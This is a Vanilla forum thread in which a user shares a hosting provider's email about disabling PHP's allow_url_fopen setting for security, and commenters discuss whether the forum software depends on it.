Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.
Options
MediaTemple GS changes php policy will this effect vanilla?
I just received an email about mediatemple changing policy on php just wondering if this will effect vanilla at all. I know many of the members here use mediatemple so I thought I would ask for all. here is the email:
-----------
We would like to inform you and the contacts on your account of a change we will be making soon to our (gs) Grid-Service platform. To further strengthen security for our clients, we will be making a global change to the PHP environment. This change will help considerably in stopping your site(s) from being compromised, as well as help thwart the unauthorized use of our servers for abusive or malicious purposes.
BACKGROUND:
There is a parameter for php called 'allow_url_fopen' that is currently enabled in both our PHP4 and PHP5 environments. If the proper precautions are not taken in PHP a large number of code injection vulnerabilities frequently reported in PHP-based web applications are possible. We understand that our customers install a great number of PHP-driven applications, many of them from the open-source community. Unfortunately a great number of them can potentially fall prey to these vulnerabilities. As a company the best that we can do in a shared environment is to provide sane global defaults that protect the majority of our customer base. This pro-active change is in the best interest of our entire customer base using our (gs) Grid-Service.
CHANGE:
Starting on 01/18/08, and continuing for several more days, we will begin disabling 'allow_url_fopen' across all of our clusters on the (gs) platform. This will be a permanent change.
PREPARATION/WORKAROUND:
In preparation for the pending change you can determine now whether your site will function with our new defaults. We have created a KnowledgeBase article at http://kb.mediatemple.net/article.php?id=793 that details how you can disable 'allow_url_fopen' now to check for any incompatibilities. The process is very straightforward; include the following line in your php.ini file at /home/####/etc/php.ini (replace #### with your site number)
allow_url_fopen = Off
This will give you a PHP environment identical to the one we will be changing to on January 18th. We strongly encourage you to thoroughly test your sites to ensure compatibility. If the change has no impact you will not have to worry. You can freely remove the line above or keep it.
Should you come across errors directly related to this change you can simply modify the flag to 'On' which will be honored post-change as well:
allow_url_fopen = On
With this particular change your setting in php.ini will always be honored regardless of the global values. With that in mind we would highly suggest further researching and examining aspects of your site that depend on this functionality to see if a safer method can be used instead. If this software was obtained from a 3rd party we would suggest contacting their developer.
Once again we will be making this rolling change to our servers starting on 01/18/08. If you need clarification of this change, or require assistance with updating your php.ini, please feel free to open a Support Request in your AccountCenter or by calling us toll-free at (877)578-4000 at any time.
Thank you for your cooperation and understanding.
0
This discussion has been closed.
Comments
Most library use fopen if they can't use curl and it should be available on mt.
allow_url_fopen is set to on by default, but it is always a good idea to disable it if you can.
The Email class is also using fsockopen.